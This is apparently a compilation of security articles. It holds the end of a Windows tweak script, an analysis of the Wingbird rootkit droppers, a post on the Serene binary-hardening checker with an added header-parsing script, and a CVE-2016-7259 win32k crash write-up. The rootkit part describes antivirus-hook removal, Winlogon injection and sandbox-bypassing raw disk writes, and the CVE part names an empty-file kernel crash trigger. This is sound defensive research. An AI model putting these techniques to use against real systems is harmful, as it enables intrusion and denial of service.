/MountDir:C:\Mnt # robocopy /S /SEC /R:0 "C:\Mnt\Program Files\WindowsApps" "C:\Program Files\WindowsApps" # dism /Unmount-Image /Discard /MountDir:C:\Mnt # Remove-Item -Path C:\Mnt -Recurse # Disable Xbox DVR # If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\GameDVR")) { # New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\GameDVR" | Out-Null 
# } # Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\GameDVR" -Name "AllowGameDVR" -Type DWord -Value 0 # Enable Xbox DVR # Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\GameDVR" -Name "AllowGameDVR" -ErrorAction SilentlyContinue # Uninstall Windows Media Player # Write-Host "Uninstalling Windows Media Player..." # dism /online /Disable-Feature /FeatureName:MediaPlayback /Quiet /NoRestart # Install Windows Media Player # dism /online /Enable-Feature /FeatureName:MediaPlayback /Quiet /NoRestart # Uninstall Work Folders Client # Write-Host "Uninstalling Work Folders Client..." # dism /online /Disable-Feature /FeatureName:WorkFolders-Client /Quiet /NoRestart # Install Work Folders Client # dism /online /Enable-Feature /FeatureName:WorkFolders-Client /Quiet /NoRestart # Set Photo Viewer as default for bmp, gif, jpg and png Write-Host "Setting Photo Viewer as default for bmp, gif, jpg, png and tif..." If (!(Test-Path "HKCR:")) { New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null } ForEach ($type in @("Paint.Picture", "giffile", "jpegfile", "pngfile")) { New-Item -Path $("HKCR:\$type\shell\open") -Force | Out-Null New-Item -Path $("HKCR:\$type\shell\open\command") | Out-Null Set-ItemProperty -Path $("HKCR:\$type\shell\open") -Name "MuiVerb" -Type ExpandString -Value "@%ProgramFiles%\Windows Photo Viewer\photoviewer.dll,-3043" Set-ItemProperty -Path $("HKCR:\$type\shell\open\command") -Name "(Default)" -Type ExpandString -Value "%SystemRoot%\System32\rundll32.exe `"%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll`", ImageView_Fullscreen %1" } # Remove or reset default open action for bmp, gif, jpg and png # If (!(Test-Path "HKCR:")) { # New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null # } # Remove-Item -Path "HKCR:\Paint.Picture\shell\open" -Recurse # Remove-ItemProperty -Path "HKCR:\giffile\shell\open" -Name "MuiVerb" # Set-ItemProperty -Path "HKCR:\giffile\shell\open" 
-Name "CommandId" -Type String -Value "IE.File" # Set-ItemProperty -Path "HKCR:\giffile\shell\open\command" -Name "(Default)" -Type String -Value "`"$env:SystemDrive\Program Files\Internet Explorer\iexplore.exe`" %1" # Set-ItemProperty -Path "HKCR:\giffile\shell\open\command" -Name "DelegateExecute" -Type String -Value "{17FE9752-0B5A-4665-84CD-569794602F5C}" # Remove-Item -Path "HKCR:\jpegfile\shell\open" -Recurse # Remove-Item -Path "HKCR:\pngfile\shell\open" -Recurse # Show Photo Viewer in "Open with..." Write-Host "Showing Photo Viewer in `"Open with...`"" If (!(Test-Path "HKCR:")) { New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null } New-Item -Path "HKCR:\Applications\photoviewer.dll\shell\open\command" -Force | Out-Null New-Item -Path "HKCR:\Applications\photoviewer.dll\shell\open\DropTarget" -Force | Out-Null Set-ItemProperty -Path "HKCR:\Applications\photoviewer.dll\shell\open" -Name "MuiVerb" -Type String -Value "@photoviewer.dll,-3043" Set-ItemProperty -Path "HKCR:\Applications\photoviewer.dll\shell\open\command" -Name "(Default)" -Type ExpandString -Value "%SystemRoot%\System32\rundll32.exe `"%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll`", ImageView_Fullscreen %1" Set-ItemProperty -Path "HKCR:\Applications\photoviewer.dll\shell\open\DropTarget" -Name "Clsid" -Type String -Value "{FFE2A43C-56B9-4bf5-9A79-CC6D4285608A}" # Remove Photo Viewer from "Open with..." # If (!(Test-Path "HKCR:")) { # New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null # } # Remove-Item -Path "HKCR:\Applications\photoviewer.dll\shell\open" -Recurse # Enable F8 boot menu options # Write-Host "Enabling F8 boot menu options..." # bcdedit /set `{current`} bootmenupolicy Legacy | Out-Null # Disable F8 boot menu options # bcdedit /set `{current`} bootmenupolicy Standard | Out-Null ########## # Restart ########## Write-Host Write-Host "Press any key to restart your system..." 
-ForegroundColor Black -BackgroundColor White $key = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") Write-Host "Restarting..." Restart-Computer Sursa: https://gist.github.com/alirobe/7f3b34ad89a159e6daa1
Wingbird rootkit analysis In previous blog posts I've described rootkits that have been used by so-called state-sponsored actors for infecting their victims, providing malware persistence and achieving SYSTEM privileges into a system. I've mentioned Remsec (Cremes) rootkit that was used by Strider (ProjectSauron) cybergroup and Sednit rootkit of APT28 (Fancy Bear) group. While Remsec rootkit has been used by operators for executing its code in kernel mode with SMEP bypass and developed in its original style, Sednit authors developed rootkit to hide their malware activity and footprints from user eyes in "usual rootkit manner". Recently one security company that investigates activity of various cybergroups, has shared with me droppers of rootkits. I've been surprised during its analysis, because the rootkit is well protected from the analysis as well as its dropper. Analysis of both rootkits took enough time, because it contain various anti-research capabilities. Size of rootkit and dropper files was significantly increased due to using code obfuscation and the presence of much garbage instructions. Moreover, both rootkits belong to one cybergroup, were developed in targeted manner and are intended for specific victims. Concept of "targeted" already long time discussed in AVers & security community as attribute of sophisticated cyberattacks, which often have state-sponsored origins. In past we saw a lot of cyberespionage operations in which have been used unique executable files that were developed for specific victims and software they use. Described in this blog post pieces of malware satisfy all the requirements, which researchers impose to highly targeted cyberattacks and possibly state-sponsored origins. I'm sure that this malware is a part of larger cyberespionage platform. This malware as well as cyber espionage group, which leverages it, was mentioned by Microsoft MMPC in their blog post and Security Intelligence Report Volume 21 here. 
The group is called NEODYMIUM and the malware is called Wingbird. Wingbird shares similarities with another well-known commercial cyberespionage toolkit, FinFisher, which Symantec detects as Backdoor.Finfish.

Dropper 1

The first dropper has the following characteristics:
- It is well protected from various methods of static and dynamic analysis. It contains various anti-disassembly, anti-debug, anti-VM and anti-dump features.
- It contains heavily obfuscated code with jumps into the middle of instructions, garbage instructions, useless checks, useless jumps, etc. Because of the many garbage instructions, the dropper is quite large (1,3MB).
- It is designed to delay its analysis as long as possible.
- It installs the rootkit into the system, dropping it into a file named logonsrv.dat. The dropper is intended only for dropping the rootkit.
- The high entropy of the .text section indicates that the code is encrypted and obfuscated.
- Both the dropper and the rootkit carry a timestamp in the PE header that looks legitimate.

A typical function ending in the dropper: all functions lead to one block of code, which is heavily obfuscated and contains useless jumps.

The Ring 0 rootkit has the following characteristics:
- The rootkit code is heavily obfuscated, making static analysis almost impossible.
- It contains encrypted code and data.
- It does not create a device object and does not communicate with Ring 3 code.
- It does not set any hooks in the Windows kernel.
- It is intended only for the hidden injection of malicious code into the trusted Winlogon process.
- It creates a copy of itself in an allocated pool region that also contains heavily obfuscated code.
- It uses self-modifying code; for example, it can rewrite important call or jmp instructions with another address or another register.
- It is designed to stay hidden as far as possible and unloads its driver once the code has been injected into Winlogon.
- It checks for the presence of the ESET Helper Driver (ehdrv.sys) in the system and removes its SSDT (KiServiceTable) hooks.

Before doing its main work, the rootkit prepares its own code for execution. It allocates two non-paged buffers: one of size 0x56000 for its driver and a second of size 0x10000. The first buffer stores a newly created (in-memory) driver that does all the necessary work; the second holds trampolines to the NT kernel API. The rootkit builds an IAT with 0x2F entries, located in a section of the new driver. But instead of using this IAT directly, the rootkit takes these addresses and uses them to modify instructions and variables in the code in the second pool region.

It is worth noting that the rootkit authors took every possible step to complicate its in-memory analysis. Even advanced users will have trouble detecting it with anti-rootkit tools:
- The rootkit does not use its original image logonsrv.dat to perform its main malicious tasks.
- It does not rely on a contiguous IAT buffer in memory that could simplify its analysis.
- It does its main work from two allocated memory (pool) blocks containing self-modifying code. One of these blocks is used as a special trampoline for NT kernel API calls.
- It calls KeDelayExecutionThread before doing its main work, i.e. before injecting code into Winlogon.

The code in the second allocated buffer (size 0x10000) contains trampolines to the NT API imported by the rootkit. Code from the created driver (in the first buffer) rewrites the instructions in these trampolines with addresses from the IAT.

After these preliminary actions, the rootkit calls ZwOpenKey to open its registry key and reads the value of the ImagePath parameter with ZwQueryValueKey. Between the two calls, the rootkit modifies its own instructions. After calling ZwQueryValueKey, the code is modified again to call PsCreateSystemThread.
The rootkit creates two threads with the PsCreateSystemThread API; one of them performs the main malicious work. It prepares the code that will be injected into Winlogon and reads the \KnownDlls\ntdll.dll section, which holds the contents of the Ntdll library, for easy access. The rootkit also imports the KeServiceDescriptorTable variable to get the address of KiServiceTable and restore entries in that table.

It seems only one function in the rootkit body was not obfuscated. This function enumerates system modules. The rootkit calls it several times: to get the NT kernel base address, to get the Ntdll base address, and to check for the presence of the ESET helper driver (ehdrv.sys). The authors take an interest in the NT kernel files because they need to restore the original SSDT functions.

It is interesting to note that the authors used the same scheme to obfuscate the rootkit driver as for the dropper: we find the same function construction inside the rootkit body, where all functions again lead to one block of code obfuscated with garbage instructions. Also interesting is that the startup code in both the dropper and the driver is not obfuscated. Considering this, it seems that one tool was used to obfuscate both the driver and the dropper, and that it runs before the compiler generates code, i.e. at source-code level.

The rootkit allocates three buffers in the Winlogon process: the first of size 0x100000, the second 0x3000 and the third 0x48000. (The Ntoskrnl functions used by the rootkit were listed in a figure that is not reproduced here.)

Dropper 2

The following characteristics relate to the second dropper:
- Like the first dropper, it is well protected from various methods of static and dynamic analysis.
- It has the same size, 1.3MB.
- It drops the Ring 0 rootkit into a file named ndisclient.dat.

The driver has the following characteristics:
- It is designed to communicate with a user-mode client through the device \Device\PhysicalDrive00 and the symbolic link \DosDevices\PhysicalDrive00.
- It is smaller than the driver from the first dropper (43 KB vs 372 KB).
- It registers three IRP dispatch entry points, for IRP_MJ_CREATE, IRP_MJ_CLOSE and IRP_MJ_DEVICE_CONTROL requests.
- It checks for the presence of the drivers \Driver\diskpt (Shadow Defender, shadowdefender.com) and \Driver\DfDiskLow (DfDiskLow.sys, Deep Freeze, Faronics Corp).
- It contains code to parse the object manager namespace via the functions ZwOpenDirectoryObject and ObQueryNameString.
- It contains obfuscated, self-modifying code that is hard for both static and dynamic analysis.
- The authors provided a DriverUnload function.
- The rootkit is intended to bypass file-system sandboxes and to modify files directly at the low hard-disk level.
- It allocates a pool block in DriverEntry that is used for the already familiar trampoline to the NT kernel API (as in the first driver).

The rootkit code in DriverEntry retrieves a pointer to the device object that represents the hard disk(s), owned by the port driver (atapi). This information is subsequently used in the IRP_MJ_DEVICE_CONTROL dispatch code to send synchronous requests to the port driver with a standard set of functions:
- MmMapLockedPagesSpecifyCache and IoAllocateMdl, to work with non-paged memory and direct I/O;
- IoBuildSynchronousFsdRequest and IofCallDriver, to build the corresponding IRP and send it to the driver;
- MmUnmapLockedPages and IoFreeMdl, to release resources.

(The original post also includes a table comparing the characteristics of both analyzed drivers.)

Conclusion

The authors of this malware made almost every effort to hamper both static and dynamic analysis. The first rootkit serves only one purpose: to inject malicious code into the Winlogon system process.
It checks for the presence of the ESET Helper Driver because that driver can block the rootkit's malicious actions, and the attackers seem sure that their victim uses this security product. Due to the high level of code obfuscation, it is useless to show images of the rootkit code, because they do not help in reconstructing the logic of its execution. The malware authors used a special tool to obfuscate the droppers and rootkits. It is not clear why the attackers did not care about the rootkit's persistence in the system and why it does not guard its own registry key.

Both rootkits are targeted at executing only one specific task each: the first injects data/code into Winlogon, and the second communicates with the hard drive at a low level. The rootkit from the second dropper does not care about its own persistence: the dropper removes the driver from disk once it has been loaded into memory.

It is worth noting that the checks for specific security products correspond to the goals of each rootkit. The first driver checks for an AV driver, whereas the second targets only system utilities that specialize in guarding the system from critical modifications. Both Shadow Defender and Faronics Deep Freeze leverage file-system sandbox methods to block potentially malicious actions against protected files in the system. This explains why the attackers need low-level disk access: they need to bypass the FS sandbox and modify the required files directly.

Posted Yesterday by Artem

Source: https://artemonsecurity.blogspot.ro/2017/01/wingbird-rootkit-analysis.html
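A defender-side example, added here and not taken from the analysis above: both droppers register a kernel driver whose image is a .dat file (logonsrv.dat, ndisclient.dat) and whose ImagePath is read back from the driver's own registry key. The script below hunts over a set of service entries for kernel-driver records that point outside the drivers directory or at a non-.sys image, and also matches the two file names the post gives. The SERVICES list is a constructed, in-memory imitation of registry entries; the service names and paths for the two .dat drivers are placeholders, since the post gives only the dropped file names. Nothing here reads the real registry.

```python
r"""Hunt for kernel-driver service entries that look like Wingbird-style installs.

Added example, not from the analysis. SERVICES is a constructed imitation of
a few HKLM\SYSTEM\CurrentControlSet\Services entries; the names and paths of
the two .dat drivers are placeholders (the post gives only the file names).
"""
import re

# Service Type values from the Windows SDK: 1 = kernel driver, 2 = file-system driver
KERNEL_DRIVER_TYPES = {1, 2}

# Rootkit image names given in the analysis (dropped by dropper 1 and dropper 2)
KNOWN_DROPPED_NAMES = {"logonsrv.dat", "ndisclient.dat"}

# Where a legitimate kernel driver image is normally expected to live
EXPECTED_DRIVER_DIRS = (r"\systemroot\system32\drivers", r"\windows\system32\drivers")

SERVICES = [  # constructed sample data, not real registry contents
    {"name": "ehdrv", "Type": 1, "ImagePath": r"\SystemRoot\System32\drivers\ehdrv.sys"},
    {"name": "atapi", "Type": 1, "ImagePath": r"system32\DRIVERS\atapi.sys"},
    {"name": "Spooler", "Type": 16, "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"name": "logonsrv", "Type": 1, "ImagePath": r"\??\C:\Windows\Temp\logonsrv.dat"},
    {"name": "ndisclient", "Type": 1, "ImagePath": r"\??\C:\ProgramData\ndisclient.dat"},
]


def normalize_image_path(image_path: str) -> str:
    """Lower-case, strip quotes and NT/Win32 prefixes, drop the drive letter,
    and expand the bare 'system32\\...' form the kernel accepts."""
    p = image_path.strip().strip('"').lower().replace("/", "\\")
    p = re.sub(r"^(\\\?\?\\|\\\\\?\\)", "", p)   # \??\C:\x or \\?\C:\x -> C:\x
    p = re.sub(r"^[a-z]:", "", p)                # C:\x -> \x
    if p.startswith("system32\\"):               # relative to \SystemRoot
        p = "\\systemroot\\" + p
    return p


def assess_service(entry: dict) -> list:
    """Return the reasons a service entry is suspicious (empty list = clean)."""
    reasons = []
    if entry.get("Type") not in KERNEL_DRIVER_TYPES:
        return reasons  # only kernel-mode drivers are in scope
    path = normalize_image_path(entry.get("ImagePath", ""))
    name = path.rsplit("\\", 1)[-1]
    if name in KNOWN_DROPPED_NAMES:
        reasons.append(f"image name {name} matches a Wingbird dropper IoC")
    if not name.endswith(".sys"):
        reasons.append(f"kernel driver image has a non-.sys extension: {name}")
    if not any(path.startswith(d) for d in EXPECTED_DRIVER_DIRS):
        reasons.append(f"driver image outside the drivers directory: {path}")
    return reasons


def hunt(services: list) -> dict:
    """Map service name -> reasons for every kernel-driver entry that looks suspicious."""
    hits = {}
    for svc in services:
        reasons = assess_service(svc)
        if reasons:
            hits[svc["name"]] = reasons
    return hits


if __name__ == "__main__":
    for name, reasons in hunt(SERVICES).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

On a live system the same `assess_service` logic can be fed from a registry export of the Services key; the path normalization is what makes the drivers-directory check meaningful, since legitimate entries use several spellings (\SystemRoot\..., \??\C:\..., bare system32\...).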
Introducing Serene
2016.12.22

[Image: Windows Defender checked with Serene]

I use a number of mountaineering references here on Summit Route, much to everyone's confusion. Mountaineering, like information security, involves risk management and the application of best practices to reduce the inherent risks. Rock climbing is one aspect of mountaineering, and it requires you to secure your ropes to an anchor (e.g. a tree, crack, or rock feature). The acronym SERENE is used as a checklist to review your anchor: the anchor needs to be Solid, Equalized, Redundant, Efficient, and have No Extension (SERENE). This doesn't check the quality of the rope, your harness, the weather, your current physical state, or many other things that will affect your safety, but it's a simple series of checks for one thing that ensures you're applying best practices.

[Image: SERENE anchor, from Wikipedia]

Similarly, I built a tool that I call Serene to perform a couple of best-practice checks on executable binaries. It's not an acronym, because there is nothing for you to remember; it does the work for you.

When a Windows executable, such as a .exe or .dll (a PE file), or an Apple Mach-O file is compiled, there are a few settings that can improve its security. These include:
- DEP/NX: Denies execution on the stack.
- ASLR/PIE: Loads the binary into a random place in memory.
- CFG (Windows only): Restricts what execution paths can be taken.
- x64: Allows a 64-bit memory space to be used for ASLR/PIE.

Serene is a simple static web app (meaning no backend server; it's just a JavaScript file that runs locally). You can drag and drop files or folders onto it and it will identify the executable binaries, perform its checks, and display the results. I do not collect copies of files, but I still advise that you should not drag and drop sensitive files to sites no matter what their stated policies are.

My primary use case for making Serene is when I evaluate products at the company I work at.
I want to get an idea of the software development practices, so this tool gives me some quick insight into that.

Examples

Windows Defender

Microsoft's Windows Defender, the default AV for Windows, can be dragged and dropped onto Serene using the folder C:\Program Files\Windows Defender\, resulting in:

[Image: Windows Defender results in Serene]

As you can see, it follows all the best practices that Serene checks for. This also shows how Serene tells you that DEP is not applicable (N/A) to these files, because all 64-bit processes have DEP applied by default. Furthermore, Windows Defender includes a number of MUI files which do not include code and therefore don't play into the security of the application, so they are ignored.

Google Chrome on macOS

Google Chrome on macOS can be analyzed by dragging and dropping the Google Chrome icon in the Applications directory, which ends up being a .app file containing the executables.

[Image: Google Chrome on macOS results in Serene]

As you can see, this time I show NX and PIE, which are the equivalents of DEP and ASLR on Windows, and don't show CFG, which has no relevance to macOS. Only some install files are missing PIE and are 32-bit, so it's not too worrying.

Checking files without Serene

Serene makes it easy to check files, but you might want to do this via the command line. You may also just want to double-check my work. To perform the same checks as Serene, using the official tools, do one of the following:

Windows executables

Windows executables are PE files and can be checked using the Visual Studio tool dumpbin. Run:

dumpbin /headers yourfile.exe

First look at FILE HEADER VALUES for the machine to determine if it is 64-bit or 32-bit. Next, look in the OPTIONAL HEADER VALUES for the DLL characteristics section for the phrases Dynamic base (ASLR), NX compatible (DEP), and Guard (CFG).

[Image: Using dumpbin to perform the same checks as Serene]

macOS executables

To manually check macOS Mach-O files, use the Xcode tool otool. Run:

otool -hv yourfile
First look at the cputype to see if it is X86_64, to determine if it is 64-bit. Next check the flags to see if they contain PIE. NX is identified by the absence of MH_ALLOW_STACK_EXECUTION (probably called something else by the tool, as I just check for that bit in the binary and don't know what the tool calls it).

[Image: Using otool to perform the same checks as Serene]

Known limitations
- On macOS, I don't currently handle Mach-O files containing multiple architectures, which is an admittedly large limitation.
- I also do not yet support ELF files, which I hope to one day handle.
- It only works with x86 and x86-64 executables, not ARM.
- Anything compiled with Golang will not have ASLR/PIE. This is a decision by the language creators, as Golang is a secure language, but if the process imports a C library, it exposes itself to possible issues. As such, I didn't want to skip Golang binaries.
- On Windows, an executable can enable DEP without it being compiled into the binary.
- If you don't have permissions to read a file, Serene may lock up and you'll need to refresh the page.
- Finally, there are all sorts of ways an application can be insecure or more secure than Serene shows. This is only identifying one set of features.

Other comments

This is really just some improvements to a project of mine from 2012 called SlopFinder.

Source: https://summitroute.com/blog/2016/12/22/introducing_serene/
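The dumpbin and otool checks described in the post, implemented as an added Python example; this is not Serene's own JavaScript and it reads only the header fields the checks need (the PE COFF and optional headers, and the thin Mach-O header). The flag and machine constants are the documented values from the PE specification and <mach-o/loader.h>; the "binaries" it inspects are constructed headers built inline, not real files. Like Serene, it reports DEP as N/A for 64-bit PE files and refuses fat Mach-O and non-x86 inputs, the two limitations the post lists.

```python
"""DEP/NX, ASLR/PIE, CFG and 64-bit checks for PE and Mach-O headers.
Added example (not Serene's code); sample inputs are constructed headers."""
import struct

# PE/COFF constants (Microsoft PE specification)
IMAGE_FILE_MACHINE_I386, IMAGE_FILE_MACHINE_AMD64 = 0x014C, 0x8664
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR  ("Dynamic base" in dumpbin)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DEP   ("NX compatible")
IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000      # CFG   ("Guard")
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B

# Mach-O constants (<mach-o/loader.h>, <mach/machine.h>)
MH_MAGIC, MH_MAGIC_64, FAT_MAGIC = 0xFEEDFACE, 0xFEEDFACF, 0xCAFEBABE
CPU_TYPE_X86, CPU_TYPE_X86_64 = 0x00000007, 0x01000007
MH_ALLOW_STACK_EXECUTION = 0x20000  # set => executable stack (no NX)
MH_PIE = 0x200000                   # set => position independent (ASLR)


def check_pe(data: bytes) -> dict:
    """Machine type and DllCharacteristics, the fields 'dumpbin /headers' shows."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    machine, _, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    if machine not in (IMAGE_FILE_MACHINE_I386, IMAGE_FILE_MACHINE_AMD64):
        raise ValueError(f"unsupported machine 0x{machine:04x} (x86/x86-64 only)")
    opt = coff + 20
    if opt_size < 72:
        raise ValueError("optional header too short for DllCharacteristics")
    magic = struct.unpack_from("<H", data, opt)[0]
    # DllCharacteristics is at optional-header offset 70 in both PE32 and PE32+
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    x64 = machine == IMAGE_FILE_MACHINE_AMD64
    return {
        "format": "PE32+" if magic == PE32PLUS_MAGIC else "PE32",
        "x64": x64,
        "aslr": bool(dllchars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        # 64-bit processes always run with DEP, so the header bit is moot
        "dep": "N/A" if x64 else bool(dllchars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "cfg": bool(dllchars & IMAGE_DLLCHARACTERISTICS_GUARD_CF),
    }


def check_macho(data: bytes) -> dict:
    """cputype and flags of a thin x86 Mach-O header, the fields 'otool -hv' shows."""
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic in (FAT_MAGIC, struct.unpack("<I", struct.pack(">I", FAT_MAGIC))[0]):
        raise ValueError("fat (multi-architecture) Mach-O not handled")
    if magic not in (MH_MAGIC, MH_MAGIC_64):
        raise ValueError("not a thin little-endian Mach-O")
    cputype, _, _, _, _, flags = struct.unpack_from("<IIIIII", data, 4)
    if cputype not in (CPU_TYPE_X86, CPU_TYPE_X86_64):
        raise ValueError(f"unsupported cputype 0x{cputype:08x} (x86/x86-64 only)")
    return {
        "format": "Mach-O 64" if magic == MH_MAGIC_64 else "Mach-O 32",
        "x64": cputype == CPU_TYPE_X86_64,
        "pie": bool(flags & MH_PIE),
        "nx": not (flags & MH_ALLOW_STACK_EXECUTION),
    }


def report(name: str, data: bytes) -> dict:
    """Dispatch on the leading magic; errors become a field instead of an exception."""
    try:
        result = check_pe(data) if data[:2] == b"MZ" else check_macho(data)
    except ValueError as exc:
        return {"file": name, "error": str(exc)}
    return {"file": name, **result}


def build_pe(machine: int, dllchars: int, pe32plus: bool) -> bytes:
    """Constructed header-only PE image (no sections): DOS stub, COFF, optional header."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt = bytearray(240 if pe32plus else 224)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", opt, 70, dllchars)
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, len(opt), 0x0102)
    return dos + b"PE\0\0" + coff + bytes(opt)


def build_macho(cputype: int, flags: int) -> bytes:
    """Constructed thin Mach-O header (no load commands); 64-bit adds the reserved word."""
    magic = MH_MAGIC_64 if cputype == CPU_TYPE_X86_64 else MH_MAGIC
    hdr = struct.pack("<IIIIIII", magic, cputype, 3, 2, 0, 0, flags)
    return hdr + (b"\0" * 4 if magic == MH_MAGIC_64 else b"")


if __name__ == "__main__":
    samples = {  # constructed inputs
        "hardened.exe": build_pe(IMAGE_FILE_MACHINE_AMD64, 0x4160, True),  # ASLR+DEP+CFG
        "legacy.exe": build_pe(IMAGE_FILE_MACHINE_I386, 0x0000, False),    # nothing set
        "app_x64": build_macho(CPU_TYPE_X86_64, MH_PIE),
        "installer_x86": build_macho(CPU_TYPE_X86, MH_ALLOW_STACK_EXECUTION),
    }
    for name, blob in samples.items():
        print(report(name, blob))
```

Point `report` at real file contents (open in binary mode) to reproduce Serene's table for a directory of binaries; the N/A for DEP on x64 and the refusal of fat Mach-O files match the behaviour described in the post.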
CVE-2016-7259: An empty file into the blue
Date: Wed 14 December 2016. By Sebastien Renaud

A binary analysis of CVE-2016-7259: a win32k kernel bug.

Foreword

The vulnerability was found by one of our fuzzers in 2015 (made by Richard) and analyzed later by me (Sebastien). The vulnerability deals with *.pfm and *.pfb files (strangely enough, not their format per se):
- Printer Font Metric (PFM) is a binary version of AFM (Adobe Font Metrics). It contains font metric information.
- Printer Font Binary (PFB) is a binary PostScript font format created by Adobe Systems. It contains a font's glyph data.

Vulnerability Description

A crash in the Windows windowing kernel graphic component (win32k.sys) happens when a specially crafted PostScript Type 1 font (*.pfm) file is loaded. The crash is due to the Windows OS not properly checking whether the size of the related *.pfb file is 0. Simply put: having an empty *.pfb file crashes the system.

Stack Trace

(See the Version Information section for software version information.)

Information and stack trace at the time of the crash, with public Microsoft symbols:

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 1E, {c0000005, 8e3c7280, 0, 18}

*** WARNING: Unable to verify checksum for Test.exe
*** ERROR: Module load completed but symbols could not be loaded for Test.exe
Probably caused by : win32k.sys ( win32k!PUBLIC_PFTOBJ::bLoadFonts+ffffffffffffff33 )

Followup: MachineOwner
---------

nt!RtlpBreakWithStatusInstruction:
8216a9f4 cc              int     3
1: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

KMODE_EXCEPTION_NOT_HANDLED (1e)
This is a very common bugcheck.
Usually the exception address pinpoints
the driver/function that caused the problem.  Always note this address
as well as the link date of the driver/image that contains this address.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 8e3c7280, The address that the exception occurred at
Arg3: 00000000, Parameter 0 of the exception
Arg4: 00000018, Parameter 1 of the exception

Debugging Details:
------------------

BUGCHECK_P1: ffffffffc0000005
BUGCHECK_P2: ffffffff8e3c7280
BUGCHECK_P3: 0
BUGCHECK_P4: 18
READ_ADDRESS:  00000018
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
FAULTING_IP:
win32k!PUBLIC_PFTOBJ::bLoadFonts+ffffffffffffff33
8e3c7280 f6411808        test    byte ptr [ecx+18h],8
EXCEPTION_PARAMETER2:  00000018
BUGCHECK_STR:  0x1E_c0000005_R
CPU_COUNT: 4
CPU_MHZ: db6
CPU_VENDOR:  GenuineIntel
CPU_FAMILY: 6
CPU_MODEL: 3a
CPU_STEPPING: 9
DEFAULT_BUCKET_ID:  WIN8_DRIVER_FAULT
PROCESS_NAME:  ConsoleApplica
CURRENT_IRQL:  0
ANALYSIS_VERSION: 10.0.10240.9 x86fre
EXCEPTION_RECORD:  a8815898 -- (.exr 0xffffffffa8815898)
ExceptionAddress: 8e3c7280 (win32k!PUBLIC_PFTOBJ::bLoadFonts+0xffffff33)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000018
Attempt to read from address 00000018
TRAP_FRAME:  a8815974 -- (.trap 0xffffffffa8815974)
ErrCode = 00000000
eax=00000000 ebx=00000000 ecx=00000000 edx=00c295b0 esi=9ee20398 edi=00000002
eip=8e3c7280 esp=a88159e8 ebp=a8815a4c iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
win32k!PUBLIC_PFTOBJ::bLoadFonts+0xffffffff`ffffff33:
8e3c7280 f6411808        test    byte ptr [ecx+18h],8       ds:0023:00000018=??
Resetting default scope
LAST_CONTROL_TRANSFER:  from 821e6aeb to 8216a9f4
STACK_TEXT:
a8814ee4 821e6aeb 00000003 6296f150 00000065 nt!RtlpBreakWithStatusInstruction
a8814f38 821e6605 8303f340 a8815338 a881536c nt!KiBugCheckDebugBreak+0x1f
a881530c 821695c6 0000001e c0000005 8e3c7280 nt!KeBugCheck2+0x676
a8815330 821694fd 0000001e c0000005 8e3c7280 nt!KiBugCheck2+0xc6
a8815350 821e479b 0000001e c0000005 8e3c7280 nt!KeBugCheckEx+0x19
a881536c 8217f672 a8815898 8226f180 a8815460 nt!KiFatalExceptionHandler+0x1a
a8815390 8217f644 a8815898 8226f180 a8815460 nt!ExecuteHandler2+0x26
a8815450 820fa3bd a8815898 a8815460 00010037 nt!ExecuteHandler+0x24
a881587c 8217b156 a8815898 00000000 a8815974 nt!KiDispatchException+0x101
a88158e8 8217d99b 00000000 00000000 00000000 nt!KiDispatchTrapException+0x4e
a88158e8 8e3c7280 00000000 00000000 00000000 nt!KiTrap0E+0x1a7
a8815a4c 8e3c0bb8 8da41000 000000d8 00000002 win32k!PUBLIC_PFTOBJ::bLoadFonts+0xffffff33
a8815aac 8e3c0aee 00000002 00000011 00000000 win32k!GreAddFontResourceWInternal+0xa3
a8815bf4 8217a417 00a65558 000000d8 00000002 win32k!NtGdiAddFontResourceW+0xbc
a8815bf4 77bcca70 00a65558 000000d8 00000002 nt!KiSystemServicePostCall
